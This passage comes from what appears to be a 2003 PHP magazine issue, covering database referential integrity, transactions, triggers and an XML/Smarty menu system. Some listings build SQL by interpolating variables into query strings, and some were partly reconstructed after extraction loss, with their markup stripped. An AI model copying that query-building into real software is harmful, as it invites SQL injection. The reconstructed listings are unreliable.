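        "CREATE TABLE ADDRESS (
            ADDRESS_ID  INTEGER PRIMARY KEY,
            CUSTOMER_ID INTEGER,
            FOREIGN KEY (CUSTOMER_ID) REFERENCES CUSTOMER (CUSTOMER_ID)
                ON DELETE $onDelete
        )"
    );
    $pdo->exec('INSERT INTO CUSTOMER VALUES (1)');
    $pdo->exec('INSERT INTO ADDRESS VALUES (10, 1)');

    try {
        $pdo->exec('DELETE FROM CUSTOMER WHERE CUSTOMER_ID = 1');
        $deleted = true;
    } catch (PDOException $e) {
        // The key refused the delete because an address still refers to the customer.
        $deleted = false;
    }

    $addresses = (int) $pdo->query('SELECT COUNT(*) FROM ADDRESS')->fetchColumn();
    return [$deleted, $addresses];
}

$restrict = try_delete_customer('RESTRICT'); // restrictive key
$cascade  = try_delete_customer('CASCADE');  // cascading key
var_dump($restrict, $cascade);
```

Each call returns whether the customer row was deleted and how many address rows are left, so the two results can be compared side by side.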
Now imagine Listing 2 running on linked tables. The referential integrity engine would either physically prevent the deletion of customer records that have addresses (restrict), or delete the addresses as well (cascade).

If you are using an RDBMS that does not support referential integrity, you can still simulate it fairly successfully. In this simple case it might be an extended version of our function from Listing 2, shown in Listing 3. Although writing code to extend this function does not appear to be too much hard work, it is obvious that simulating even a simple restrictive referential integrity engine can mean writing some amount of extra code. Simulating a cascading delete is a fairly simple change (shown in Listing 4).
There are some performance issues to consider when using cascading updates. If your database server contains a large amount of related data, the change or deletion of some master records could force the database server to perform large, time-consuming update operations. In the worst case scenario, this could result in exceptional load on the server, as well as script execution timeouts.

The proper use of referential integrity can help to reduce the amount of sanity checking code necessary and the number of errors introduced, as well as helping to increase the amount of sleep you get at night.

Transactions

OK, we did a nice job programming an integrity-checking routine which checks for existing addresses and either prevents us from deleting the customers to which they belong, or deletes the addresses as well. Consider, though, that your application communicates with the remote database server through some wired link. Imagine that, just between deleting data from the ADDRESS table and the CUSTOMER table, someone cuts the wire. Of course, this is not a huge problem in our simple case, but there are complex situations where this would be a big problem.
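Listing 5

<?php

// The first lines of this listing were lost in extraction. The function
// signature, the two UPDATE strings and the $success initialisation are
// reconstructed from the description in the text and are assumptions.
function change_customer_id($dbh, $old_customer_id, $new_customer_id)
{
    $query_update_address  = "UPDATE ADDRESS SET CUSTOMER_ID = '$new_customer_id' "
                           . "WHERE CUSTOMER_ID = '$old_customer_id'";
    $query_update_customer = "UPDATE CUSTOMER SET CUSTOMER_ID = '$new_customer_id' "
                           . "WHERE CUSTOMER_ID = '$old_customer_id'";

    // Error indicator: stays 0 unless both updates succeed
    $success = 0;

    // Turn off auto commit so both updates run inside one transaction
    $dbh->autoCommit(false);

    $result = $dbh->query($query_update_address);
    if ($dbh->isError($result))
    {
        // display an error message and exit
        echo "Error updating addresses.";
    }
    else
    {
        $result = $dbh->query($query_update_customer);
        if ($dbh->isError($result))
        {
            // display an error message and exit
            echo "Error updating customer.";
        }
        else
        {
            // Indicate that all intended has been done
            $success = 1;
        }
    }

    if ($success == 1)
    {
        // If no error happened, we commit the work
        $dbh->commit();
    }
    else
    {
        // Otherwise, we can undo a complete task
        // leaving the data in the state just as before we started
        $dbh->rollback();
    }

    // You might want to set auto commit option
    // back to True for other processes that do not use transactions
    $dbh->autoCommit(true);

    return $success;
}

?>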
Besides, users would be confused if addresses were deleted while customer data stayed.

How can we get around this? By using transactions. Transactions are, roughly explained, closed processes that are invisible to concurrent database users. A transaction remains invisible to other users until such time as it is committed. If a transaction is rolled back, or discarded, other users will never know it even happened in the first place. This means that when we start a transaction, whatever we do with data in the database will be invisible to other users. If we send a COMMIT statement, all of our work will actually be written to the database and other users will be able to see the altered values. If we issue a ROLLBACK statement, no changes will be written at all, leaving the data in the same state as we started with. A transaction rollback, depending on the database server’s settings, also happens when the connection to the server is lost or broken, or if an error condition was raised while we were working. That is awesome data consistency protection!

As we mentioned, in the previous data deletion example a break between the two DELETE statements could, at worst, leave a customer without address data. What if, for some particular reason, we want to change our customer’s ID? To keep data in the two tables related to each other, the changed ID must also be updated in all customer address records. If the connection breaks in the middle of the changes, our addresses could be left without a customer, or our customer could be left without addresses. By invoking a transaction before we start updating data, and committing it after updates have completed, we can ensure that no data will be left in an inconsistent state. An example is given in Listing 5.

Let’s have a look at it. After we set up the queries to run in order to change our customer ID from $old_customer_id to $new_customer_id, we also set up an error indicator.
The $success variable will tell us if all has been completed correctly at the end of our function. Notice one special function call, $dbh->autoCommit(false). This function tells the RDBMS which serves our data that we want to turn off the ‘auto commit’ feature. ‘Auto commit’ is supported by many database server engines, and it means simply that the transaction started implicitly by each query will automatically be committed when the query is finished. Most RDBMSs have this turned on by default, but to prevent storing incomplete changes we must turn this feature off. We do not want to store anything until all changes are complete.

In the PEAR DB class we can turn off ‘auto commit’ programmatically by calling the autoCommit() method. Calling this method actually means that the first and subsequent changes to our data will be done within a transaction, and will not be written or discarded until we issue a commit or a rollback. At the end of our function in Listing 5, we can check if any errors happened while updating the data. If not, we can call the commit() method, which will write out all of our changes and close the transaction. If an error did occur, we can simply call the rollback() method, which will discard all of our changes and close the transaction.

Somewhat better error handling around the commit() call could be added here. Even calling the commit() method could cause an error, in which case no data would be written. It is important to handle transaction completion properly because leaving open transactions (especially in conjunction with table locks) could cause locked data and prevent other users from accessing the database!
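The commit-or-rollback pattern described above can be observed directly by forcing the second update to fail. The sketch below rests on assumptions that are not in the article: it uses PDO with in-memory SQLite instead of PEAR DB, so beginTransaction(), commit() and rollBack() take the place of autoCommit(false), commit() and rollback(); the tables are reduced to a couple of columns and the sample rows are invented.

```php
<?php
// Sketch only: PDO and in-memory SQLite stand in for the article's PEAR DB handle.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE CUSTOMER (CUSTOMER_ID INTEGER PRIMARY KEY, LAST_NAME TEXT)');
$pdo->exec('CREATE TABLE ADDRESS (ADDRESS_ID INTEGER PRIMARY KEY, CUSTOMER_ID INTEGER)');
$pdo->exec("INSERT INTO CUSTOMER VALUES (1, 'Adams'), (2, 'Baker')");
$pdo->exec('INSERT INTO ADDRESS VALUES (10, 1)');

// Both updates succeed together or are undone together.
function change_customer_id(PDO $pdo, int $old, int $new): bool
{
    $pdo->beginTransaction();
    try {
        $pdo->prepare('UPDATE ADDRESS SET CUSTOMER_ID = ? WHERE CUSTOMER_ID = ?')
            ->execute([$new, $old]);
        $pdo->prepare('UPDATE CUSTOMER SET CUSTOMER_ID = ? WHERE CUSTOMER_ID = ?')
            ->execute([$new, $old]);
        $pdo->commit();
        return true;
    } catch (PDOException $e) {
        // Undo the address update as well, so nothing is left half-changed.
        $pdo->rollBack();
        return false;
    }
}

// Reads which customer currently owns address 10.
function address_owner(PDO $pdo): int
{
    return (int) $pdo->query(
        'SELECT CUSTOMER_ID FROM ADDRESS WHERE ADDRESS_ID = 10'
    )->fetchColumn();
}

// ID 2 is already taken, so the second UPDATE fails and everything is rolled back.
$failed = change_customer_id($pdo, 1, 2);
$owner_after_failure = address_owner($pdo);

// ID 5 is free, so both updates are committed.
$succeeded = change_customer_id($pdo, 1, 5);
$owner_after_success = address_owner($pdo);

var_dump($failed, $owner_after_failure, $succeeded, $owner_after_success);
```

The first call is the interesting one: the address update had already run when the customer update failed, yet after the rollback the address still points at the old ID.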
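Listing 6

<?php

// The first lines of this listing were lost in extraction. The function
// signature and the two query strings are reconstructed from the surrounding
// text and from the parameter list in Listing 7; treat them as assumptions.
// The values passed in are assumed to be escaped already.
function add_customer($dbh, $first_name, $last_name, $additional_info, $gender)
{
    $query_last_id = "SELECT MAX(CUSTOMER_ID) AS LAST_ID FROM CUSTOMER";

    // Get the highest customer ID used so far
    $result = $dbh->query($query_last_id);
    $row = $result->fetchRow(DB_FETCHMODE_ASSOC);

    // Now increase its value
    $new_id = $row['LAST_ID'] + 1;

    // The INSERT can only be built once the new ID is known
    $query_insert_customer =
        "INSERT INTO CUSTOMER (CUSTOMER_ID, FIRST_NAME, LAST_NAME, GENDER, ADDITIONAL_INFO) "
        . "VALUES ('$new_id', '$first_name', '$last_name', '$gender', '$additional_info')";

    // Let's insert the data
    $result = $dbh->query($query_insert_customer);
    if ($dbh->isError($result))
    {
        // display an error message and exit
        echo "Error adding customer.";
        return 0;
    }
    else return 1;
}

?>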
It should be noted that, although we used the PEAR methods above, transactions can usually be set up manually with SQL statements. The exact syntax varies from system to system.

We should also mention that transactions could be simulated by PHP. Any simulation of this feature would be hard-pressed to be robust enough for real world use, and would be a very complex piece of code, but it is possible to do. The most common way is to prepare all edits and updates in separate tables and then transfer them to the actual data tables, checking if all updates were OK.

Listing 7

PROCEDURE NEW_CUSTOMER (FIRST_NAME, LAST_NAME, ADDITIONAL_INFO, GENDER)
BEGIN
    GET_NEW_CUSTOMER_ID;  -- an SQL code or function to get new customer ID
    INSERT_NEW_CUSTOMER;  -- an SQL code to insert data into table CUSTOMER
END

Listing 8

CREATE TRIGGER before_new_customer
BEFORE INSERT ON CUSTOMER
REFERENCING NEW AS new_customer_row
FOR EACH ROW
BEGIN
    SET new_customer_row.CUSTOMER_ID = (SELECT MAX(CUSTOMER_ID)+1 FROM CUSTOMER);
END

Procedures and Functions

Procedures, functions, or stored procedures – they are all essentially the same thing: blocks of code (using some supported language, such as SQL, PL/SQL, C, Java, and recently PHP!) that are executed on the database server. Procedures that run on the database server have many uses, including embedding business logic in the database, data consistency checking, and simplification of the database access interface.

Let’s look at an example. Consider that instead of customer updates or deletes, we now have the need to add a new customer into the database. Among other data, we must provide a unique ID value to identify the customer. A PHP function to store new customer data into the database could look something like Listing 6.

Notice that we do not receive CUSTOMER_ID as a parameter to the function. Instead, we retrieve the highest existing value from the CUSTOMER table and add one to it. But what if, just between when we got the last ID and inserted our new record, someone else got the same ID and tried to insert data at the same time? One of us would receive an error and no data would be inserted!

Procedures can offer a good solution to this problem, as they are executed very quickly, and may be executed serially on your system. This means that we can use them to “get around” the aforementioned race condition, or at least narrow the window. Truly patching this race condition would usually require table locking, which may be the subject of a future article.

As the code for writing database procedures is often very specific to each database system, we will skip writing a real example, point you to some pseudo code in Listing 7, and ask you to consult your local database system manual.
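Even without a stored procedure, the gap between reading the last ID and writing the new row can be narrowed by letting a single INSERT compute the ID itself. What follows is only a sketch of that idea, not the article’s method: it assumes PDO with in-memory SQLite rather than PEAR DB, add_customer is a hypothetical helper, the table is trimmed to three columns, and whether a single statement is enough to rule out the race entirely depends on the database server and its locking behaviour.

```php
<?php
// Sketch only: PDO and in-memory SQLite stand in for the article's PEAR DB handle.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec(
    'CREATE TABLE CUSTOMER (
        CUSTOMER_ID INTEGER PRIMARY KEY,
        FIRST_NAME  TEXT,
        LAST_NAME   TEXT
    )'
);

// Hypothetical helper: the new ID is computed inside the INSERT statement,
// so there is no separate "read MAX" query followed later by a "write row" query.
function add_customer(PDO $pdo, string $first, string $last): int
{
    $stmt = $pdo->prepare(
        'INSERT INTO CUSTOMER (CUSTOMER_ID, FIRST_NAME, LAST_NAME)
         SELECT COALESCE(MAX(CUSTOMER_ID), 0) + 1, ?, ? FROM CUSTOMER'
    );
    $stmt->execute([$first, $last]);

    // In SQLite an INTEGER PRIMARY KEY is the row id, so this is the new CUSTOMER_ID.
    return (int) $pdo->lastInsertId();
}

$first_id  = add_customer($pdo, 'Ann', 'Adams');
$second_id = add_customer($pdo, 'Bob', 'Baker');
echo "New customer IDs: $first_id, $second_id\n";
```

The COALESCE call covers the empty-table case, where MAX(CUSTOMER_ID) would otherwise be NULL.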
Triggers

Triggers are usually functions in disguise, linked to a specific table, and executed before or after events like inserting, updating or deleting records. There can often be more than one trigger attached to a single table, and triggers are then executed in a specified order, one by one. The most common use of triggers is for maintaining referential integrity. Triggers specified before an action can often choose to prevent the action, or perform other actions on other tables (like deleting matching records, in the case of cascade). Triggers can also change values in the row being modified. This will help us in our next example.

Rather than having to run a query to find out what ID we can use, then inserting another row, wouldn’t it be much nicer to just insert the row and let the system worry about giving it an ID? This is exactly how Listing 8 works. Listing 8 shows a trigger on the CUSTOMER table, to be fired right before the row is inserted. The body of the trigger (whose real implementation would vary greatly on different systems) gets the next ID, and sets the CUSTOMER_ID field in the inserted row. This way, adding a new row is as simple as inserting the data, not worrying about which ID to use. Again, we have to worry about a race condition, but this could be handled with table locks or sequences – topics for another day.

Wrapping up

There are a number of advanced features that we haven’t covered here, including table locking, row locking, sequences, rules, etc. Perhaps these can be the topics for another article.

The more tasks the database server can do for your application, the less code you will have to write. Stability, security, and performance are also a consideration. Generally speaking, features embedded in the server are going to be much more robust and reliable than any simulation we can make. As database systems are improved, more automated features will likely be engineered and introduced, allowing us to focus on the more important things.

You might think that you should search out the database with all of these features, and be set for the future, but that’s not necessarily true. Most of the above features come at a cost, and usually it’s performance. If you don’t anticipate a need for these more advanced capabilities, you may see much better performance with a less advanced system.
About the Author
Davor Pleskina lives in Opatija, Croatia. He is the author of Davor's PHP Editor. You can reach Davor at [email protected].
Creating a Reusable Menu System with XML and PHP
F E A T U R E
by Leon Vismer
Introduction
Over the last few months we have seen some thought-provoking articles on technologies like XML and the Smarty template engine. Other articles have indirectly expressed the advantages of using OOP (object-oriented programming) instead of procedural programming. In this article we would like to focus on combining the knowledge from these previous gems to build something useful every web developer can use.

Every modern Internet or intranet web application these days requires some sort of menu structure or interface to allow for easy navigation within the application. Let’s use the aforementioned technologies to build a reusable menu structure. This menu structure will make use of object-oriented concepts, be defined in XML, and be driven by templates/styles to allow changes to the look and feel.

Before we start
Firstly, let’s quickly get the logistical things out of the way. To make sure that everything runs smoothly on your side you are going to need the Expat XML library and the Smarty template engine installed. Most Linux distributions have the Expat library compiled in with the PHP package (Debian, Redhat, Mandrake, Suse). You can use the following code to see if Expat has been included in your PHP package:

<?php phpinfo(); ?>
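As an alternative to scanning the phpinfo() page by eye, the check can also be done in code. This is only a minimal sketch: it assumes that the standard extension_loaded() and function_exists() calls are enough to detect the XML extension, and the variable name $hasXml is ours, not part of the article's code.

```php
<?php
// Ask PHP directly whether the XML (Expat-based) extension is available.
// $hasXml is an illustrative name, not something from the article's listings.
$hasXml = extension_loaded('xml') && function_exists('xml_parser_create');

echo $hasXml ? "XML support active\n" : "XML support missing\n";
```

If the second message appears, the XML extension needs to be enabled before any of the later examples will run.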
September 2003 ● PHP Architect ● www.phparch.com
You should see a section ‘xml’ with ‘XML support active’ and the ‘EXPAT Version’ as shown in Figure 1. If you do not have Expat support you can get the source from http://sourceforge.net/projects/expat/. To include Expat support within PHP simply include --with-xml when running the configure build script from the PHP source directory. However, it is highly unlikely that you will not have Expat support.

Figure 1
xml
XML Support: active
XML Namespace Support: active
EXPAT Version: expat_1.95.6

REQUIREMENTS
PHP: 4.2+, XML extension, MySQL
OS: N/A
Applications: Smarty
Code Directory: xml_menus

The Smarty template engine is downloadable from http://smarty.php.net and the latest version as of this writing is version 2.5.0. Why use Smarty? First of all, reinventing a well-invented wheel is seldom necessary. Second, it is almost always advisable to separate the business logic from the presentation layer, and Smarty does a good job of that. You will need to uncompress the Smarty source code into a PHP-accessible directory. In my code distribution, I include a code/class.MySmarty.php wrapper file (we will discuss this later) that includes the Smarty template engine as:

require_once('smarty/Smarty.class.php');
You might need to change this require statement to point to the correct location of Smarty. The source code for this article contains a ‘code’ directory that should be moved into a web-accessible area on your local machine in order to make the examples work.

In this article I presume that you know some basics about XML, object-oriented programming and using the Smarty template engine. In the same breath, however, I would also like to use this article to introduce some of these concepts. I hope you enjoy the ride!

Our requirements
Let’s have a look at what we would like to see in our menu component.
• We want to store our menu structure in a manageable, portable structure, so we will be using XML to define our menu structure
• The menu structure must be able to handle the following:
  - an optional menu heading
  - multiple collapsible menu sections
  - multiple menu items under each menu section
  - menu items must support an image and/or text description
• The menu structure needs to support HTML frames, directing access to different windows
• The menu needs to support different themes or styles
• We need to be able to use our menu as a drop-in component to an existing page or as a standalone menu interface with a separate header and footer to signify a complete HTML page. We will be able to achieve this functionality using our templates.

The following is the basic outline of our menu system:
menu heading (optional)
  menu section1 (optional) (click to expand/collapse)
    menu item
    menu item
  menu section2 (optional) (click to expand/collapse)
    menu item
    menu item

Listing 1: menu_example_1.xml
<menu> php|a <state>closed
<section id="Company Management">
Add a new company action.php?function=add_company
Delete a company action.php?function=del_company
<section id="User Management">
Add a new user action.php?function=add_user
Delete a user action.php?function=del_user
Mapping what we need into XML
Next we need to look at mapping our menu requirements into an XML definition. In Listing 1 (menu_example_1.xml) we see the menu definition starting and ending with <menu> tags. The example menu is typical of something we would find in a web administration section. Every menu structure has an optional menu heading and the default state of the menu (either open or closed). The menu structure can have multiple sections with multiple menu items linked to a specific section. Every section has a unique id that identifies the section. We will use this id as the heading/title for the section. Multiple menu items can belong to a section. Every item has an item name to identify the menu item, the item’s
link, and an optional image for the menu item. In our example, every menu item will be using the arrow.gif image to identify a menu item.

How does everything fit together?
We will take a slightly different approach here, and show you the end result first. Listing 2 (menu.php) shows how we would like to create our menu. We first create an instance of the Menu class. The Menu class constructor takes two parameters: our menu structure, saved as an XML file, and the style we would like to use for displaying the menu. We then set the default target of the menu items to ‘info’ (an HTML frame). After creating the menu with a call to buildMenu(), we display the menu on screen. Wow, five lines of code; that looks easy.

I see that hand. Yes, we will be working in a framed environment for this example. Listing 3 (example_1.html) shows the HTML code we will use. For those of us that have itchy fingers, you are welcome to open example_1.html in your browser to see the menu we have just created. You are only allowed to do that, though, if you promise to return. After all, we will need to have a look at how we did that. Figure 2 is a screen shot of the ‘default’ menu style with both sections expanded. (The ‘default’ style’s images and style sheet are included in the article’s source directory.)

Figure 2
Listing 3: example_1.html
Menu Example 1

What do we need to continue?
Looking at Listing 2, we will explain our project by examining the following:
1. We will first look at a class for parsing our XML menu structure. This class will create a menu array, containing the structure and information about our menu.
2. Second, we will look at a class to manage the style component of our menu. We will examine our style file (menu.tmp) and the code we use to assign the Smarty variables within our menu template.
3. Third, we will look into the detail of creating collapsible and expandable menu sections and items.
4. Finally, we will end off with the Menu class, tying all of this together.

Let’s carry on by looking at the XML parser class.
The XML parser
On to the real stuff. In our XML class we want to create an array that will hold the contents of our menu structure. Looking at Listing 4 (class.MenuXML.php), we see the MenuXML class with four important class variables.
$data     Contains the menu structure we want to parse
$menu     Will contain our menu structure array
$heading  Contains the heading we are using for our menu
$state    Contains the default state of the menu (open or closed)
Our class constructor expects a $data variable. If the $data variable is a valid file location, we read the contents of the file into our $data class variable; otherwise the $data variable itself is assigned to the class $data variable. By doing it this way, we allow future support where we could create our menu XML structure from a database, choosing not to store the menu structure in a file. We next call the loadXML() method to create our menu array.

In our loadXML() method we first load the contents of our menu structure file into a variable. After creating an XML parser, a call to xml_parse_into_struct() parses the XML data into two array structures. The $i_ar (index) array contains pointers to the location of the appropriate values in the $d_ar (values) array. After freeing the XML parser we are ready to work with our values array ($d_ar) to construct our menu array. Looping over our values array ($d_ar), we set our heading, state and type class variables. When we encounter a ‘section’ element we get the value of the ‘id’ attribute. The ‘id’ attribute’s value will be used as a $key for building our menu array. The following code tests our MenuXML class.

<?php
require_once('./class.MenuXML.php');
$xml = new MenuXML('./menu_example_1.xml');
echo '<pre>';
echo $xml->heading . "\n";
echo $xml->state . "\n";
echo $xml->type . "\n";
print_r($xml->menu);
echo '</pre>';
?>
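The parsing steps described above can be sketched in a few lines. This is not the article's class.MenuXML.php: the element and attribute names in the sample document (heading, state, item, href, image) are assumptions made for illustration, and the resulting array uses simple sequential keys rather than the value-array indexes seen in Listing 5. Only xml_parser_create(), xml_parser_set_option() and xml_parse_into_struct() are standard PHP calls.

```php
<?php
// Hypothetical menu definition: tag and attribute names are assumptions,
// not the exact markup of the article's Listing 1.
$data = <<<XML
<menu>
  <heading>php|a</heading>
  <state>closed</state>
  <section id="Company Management">
    <item href="action.php?function=add_company" image="images/arrow.gif">Add a new company</item>
    <item href="action.php?function=del_company" image="images/arrow.gif">Delete a company</item>
  </section>
</menu>
XML;

// Accept either a file name or the XML text itself, as the constructor does.
if (is_file($data)) {
    $data = file_get_contents($data);
}

$parser = xml_parser_create();
// Keep tag names as written instead of folding them to upper case,
// and skip values that consist only of whitespace.
xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, 0);
xml_parser_set_option($parser, XML_OPTION_SKIP_WHITE, 1);
xml_parse_into_struct($parser, $data, $d_ar, $i_ar);
unset($parser); // release the parser (older PHP versions call xml_parser_free())

$heading = '';
$state   = '';
$menu    = array();
$key     = null;

// Walk the values array and collect heading, state, sections and items.
foreach ($d_ar as $node) {
    if ($node['tag'] === 'heading' && $node['type'] === 'complete') {
        $heading = $node['value'];
    } elseif ($node['tag'] === 'state' && $node['type'] === 'complete') {
        $state = $node['value'];
    } elseif ($node['tag'] === 'section' && $node['type'] === 'open') {
        $key = $node['attributes']['id'];   // the section id becomes the array key
        $menu[$key] = array();
    } elseif ($node['tag'] === 'item' && $node['type'] === 'complete') {
        $menu[$key][] = array(
            'name'  => $node['value'],
            'href'  => $node['attributes']['href'],
            'image' => $node['attributes']['image'],
        );
    }
}

print_r($menu);
```

Because the input is checked with is_file() first, the same code path works whether the menu definition lives in a file or is handed over as a string built elsewhere.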
Listing 5 shows us the output of the above script, derived from the XML definition in Listing 1 (menu_example_1.xml).

Using Smarty and our MenuStyle class
As we defined in our requirements, our menu system needs to support themes or styles.
Listing 6 (class.MySmarty.php) is a wrapper class that extends the Smarty class. In our constructor we set the template directory, the config directory, the compile directory and, lastly, a directory where we store extra Smarty plug-ins. If the ‘compile’ directory does not exist, we create it and set the appropriate permissions. (You might need to change this setting if your template directory needs to have world access.)

Listing 7 (class.MenuStyle.php) contains our MenuStyle class, which manages the style or theme of our menu system. The style class currently only works with one Smarty template file, called menu.tmp, stored in the style’s specific directory ‘style/STYLE_NAME/’. Listing 8 is the default menu.tmp style file (style/default/menu.tmp) which we used to build the look and feel in Figure 2. The accompanying source code also includes the style sheet (styles.css).

Have a look at the sidebar on Smarty (page 40) if you’re a little rusty or have never ventured that way. As we look at our style class, we will see the Smarty functions assign() and fetch() being used. You should be familiar with the assign() function from the sidebar; the fetch() function returns our completed template into a variable, instead of directly printing it out.

In our style class’ constructor, shown in Listing 7, if we pass an empty style, the template style becomes the ‘default’ style and we then set the style directory. Finally, we create an instance of our Smarty class wrapper to work with the appropriate menu.tmp file. The rest of the class contains the following methods that are used to set Smarty variables in our template:
• setHeading() A function to set the optional heading to the menu using our menu array variable
• setXML() Sets the menu array variable in our template for building our sections and menu items
• setSectionURL() Sets the section URL for collapsing and expanding a section
• Finally, the getMenu() method returns our completed Smarty menu using the fetch() function.

Listing 7: class.MenuStyle.php
...
        $this->styleDir = 'styles/'.$style;
        $this->tmpl = new MySmarty($this->styleDir);
    }

    function setHeading($heading)
    {
        $this->tmpl->assign('heading', $heading);
    }

    function setXML($xml)
    {
        $this->tmpl->assign('xml', $xml);
    }

    function setSectionURL($url)
    {
        $this->tmpl->assign('click', $url);
    }

    function getMenu()
    {
        return $this->tmpl->fetch('menu.tmp');
    }
}

Listing 5
<pre>php|a
closed

Array
(
    [Company Management] => Array
        (
            [1] => Array
                (
                    [name] => Add a new company
                    [href] => action.php?function=add_company
                    [image] => images/arrow.gif
                )
            [3] => Array
                (
                    [name] => Delete a company
                    [href] => action.php?function=del_company
                    [image] => images/arrow.gif
                )
        )
    [User Management] => Array
        (
            [6] => Array
                (
                    [name] => Add a new user
                    [href] => action.php?function=add_user
                    [image] => images/arrow.gif
                )
            [8] => Array
                (
                    [name] => Delete a user
                    [href] => action.php?function=del_user
                    [image] => images/arrow.gif
                )
        )
)

Supporting collapsible and expandable menu sections
Another requirement for our menu is to support collapsible sections. In other words, when we click on the ‘section’, the ‘items’ connected to the specific section should collapse or expand. We will be able to achieve this by storing a CGI variable that contains the state of each section. The easiest way to demonstrate this is to show the following HTML that defines our menu from Listing 1.

Company Management
Add a new company
Delete a company
User Management
Add a new user
Delete a user
Wow, this looks like a mouthful! It isn’t really, though. Basically, we only need to look at the ‘section’ part of our menu. We have two sections and we store a ‘click’ variable and an ‘m_X’ variable per section. The ‘m_0’ and ‘m_1’ variables store the current status of our section, ‘off’ meaning the section is collapsed and ‘on’ meaning the section is expanded. The ‘click’ variable tells us which section we selected and means that we need to change the ‘m_X’ variable from ‘off’ to ‘on’ or ‘on’ to ‘off’ for the particular section. Looking at Figure 2 as our example, we will have both ‘m_0’ and ‘m_1’ set to ‘on’.
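The toggling rule can be illustrated with a short sketch. It assumes the state arrives as plain request variables named ‘click’, ‘m_0’ and ‘m_1’, as described above; the $request array stands in for $_GET, and the variable names $sections and $states are ours rather than the article's.

```php
<?php
// Hypothetical request: the visitor clicked section 0 while both sections
// were collapsed. In a real page these values would come from $_GET.
$request  = array('click' => '0', 'm_0' => 'off', 'm_1' => 'off');
$sections = array('Company Management', 'User Management');

$states = array();
foreach ($sections as $i => $name) {
    // Treat a section as collapsed when no state was passed in for it.
    $current = isset($request["m_$i"]) ? $request["m_$i"] : 'off';

    // Flip only the section that was clicked; all others keep their state.
    if (isset($request['click']) && (string) $request['click'] === (string) $i) {
        $current = ($current === 'on') ? 'off' : 'on';
    }
    $states["m_$i"] = $current;
}

print_r($states);
```

Keeping the whole state in the URL means the menu needs no session or cookie: every link carries everything required to redraw it.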
A Smarty primer
Referencing Listing 8 (menu.tmp), this is meant to be a very quick primer on the usage of Smarty. I will try to briefly explain the Smarty concepts we are using in our menu template. All of the text between curly brackets ( { and } ) in a Smarty template contains code that is interpreted by the Smarty template engine. Let’s look at this in a little more detail.

Variables
A variable within Smarty is represented by {$variable_name}. To assign a variable value within a Smarty template we use the assign() function in our PHP script. As an example, to set the template variable {$heading} to ‘php|a’ we will need the following code:

$tmpl->assign('heading', 'php|a');

Another variable to take note of in our template is {$smarty.get.page} which returns the name of the current script, similar to $SCRIPT_NAME.

Counters
We define a counter variable within Smarty using the following syntax:

{counter start=X print=Boolean}

The following code sets up a counter, making the start value of the counter -1, and does not print the current counter to the screen.

{counter start=-1 print=false}

Additional calls within the template to {counter} will print the values 0,1,2,3...X, respectively, seeing as our start value was set to -1.

Control Structures
In our template we use two control structures. The ‘if’ statement in Smarty has much the same functionality as the if statement in PHP except that the syntax looks like this:

{if $variable eq 'php|a'}
  some html text if the variable matches
{else}
  some html text if the variable does not match
{/if}

The ‘foreach’ statement is used to loop over an array variable within Smarty. The ‘foreach’ statement sets the ‘from’ field to the array being looped over, the ‘key’ field sets the current array key we are working with, and the ‘item’ field contains the current element variable in the array. As an example, if we had the following array in PHP

$php_array = array (
    '0' => array ( 'name' => 'Leon', 'surname' => 'Vismer'),
    '1' => array ( 'name' => 'Tikvah', 'surname' => 'Vismer')
);

we could use the ‘foreach’ statement to print out the array as follows

{foreach from=$array key=key item=current}
  Working with {$key}: Name: {$current.name} Surname: {$current.surname}
{/foreach}

setting the $array value in our Smarty template using

$tmpl->assign('array', $php_array);

The above Smarty code will create the following output

Working with 0: Name: Leon Surname: Vismer
Working with 1: Name: Tikvah Surname: Vismer

Putting it all together
Listing 9 (class.Menu.php) shows the class for creating and displaying our menu using all of our previously defined classes. Firstly, we include our MenuXML class and our MenuStyle class for handling the look and feel of our menu. Our Menu class has three important class variables.
$data   A file reference or the contents of our menu structure in XML
$style  The menu display style we are using
$xml    A MenuXML object built with the contents of $data
After checking that the $data and $style variables are OK, we create an instance of our MenuXML class. We then create an instance of our MenuStyle class using the $style variable. In our example, we are using the ‘default’ style, which we know by now will be lying in the style/default/ directory. At this stage, our style only includes one file, menu.tmp, which is a Smarty template that is managed with our MenuStyle class. Finally we set the default target for any HTML links to ‘_top’.

Keeping Listing 2 in mind, we will now look at our buildMenu() method, which forms the heart of our Menu class. Using our MenuStyle object, we set the heading of the menu from our menu array, created in MenuXML. We then set the value of the current menu section that has been clicked on. Looping over our menu array, we retrieve the values of the current open and closed sections and set the new ‘on’ or ‘off’ values for ‘m_X’ in our section URL as we continue. Using the $menu_href array, we store the current new values of our section URL to update into our template.

We then loop over every menu item within a section and set a flag in our menu array as to whether the item under that section needs to be displayed in our template or not. Here we add the display key to our array with a value of 1 to display the menu item and 0 to hide it. As an example, if we selected the ‘Company Management’ section from our example, our menu array from Listing 5 will be changed to the following (notice the extra display key):

[1] => Array
    (
        [name] => Add a new company
        [href] => action.php?function=add_company
        [image] => images/arrow.gif
        [display] => 1
    )
[3] => Array
    (
        [name] => Delete a company
        [href] => action.php?function=del_company
        [image] => images/arrow.gif
        [display] => 1
    )
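The two loops described for buildMenu() could look roughly like the following. This is a sketch under stated assumptions rather than the code from Listing 9: the $states array (one ‘m_X’ entry per section) and the query-string layout are illustrative, while $menu_href and the display key come from the text above. http_build_query() is a standard PHP function.

```php
<?php
// Assumed inputs: a menu array shaped like Listing 5 and the per-section
// states after the click has been applied (both trimmed for brevity).
$menu = array(
    'Company Management' => array(
        1 => array('name' => 'Add a new company', 'href' => 'action.php?function=add_company'),
        3 => array('name' => 'Delete a company',  'href' => 'action.php?function=del_company'),
    ),
    'User Management' => array(
        6 => array('name' => 'Add a new user', 'href' => 'action.php?function=add_user'),
    ),
);
$states = array('m_0' => 'on', 'm_1' => 'off');

$menu_href = array();
$index = 0;
foreach ($menu as $section => $items) {
    $open = ($states["m_$index"] === 'on');

    foreach ($items as $id => $item) {
        // 1 shows the item in the template, 0 hides it.
        $menu[$section][$id]['display'] = $open ? 1 : 0;
    }

    // Link that re-requests the page with this section marked as clicked,
    // carrying the state of every section along with it.
    $menu_href[$section] = '?' . http_build_query(array('click' => $index) + $states);
    $index++;
}

print_r($menu_href);
```

Because the display decision is stored per item rather than per section, a later privilege check could switch individual items off without touching the section state.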
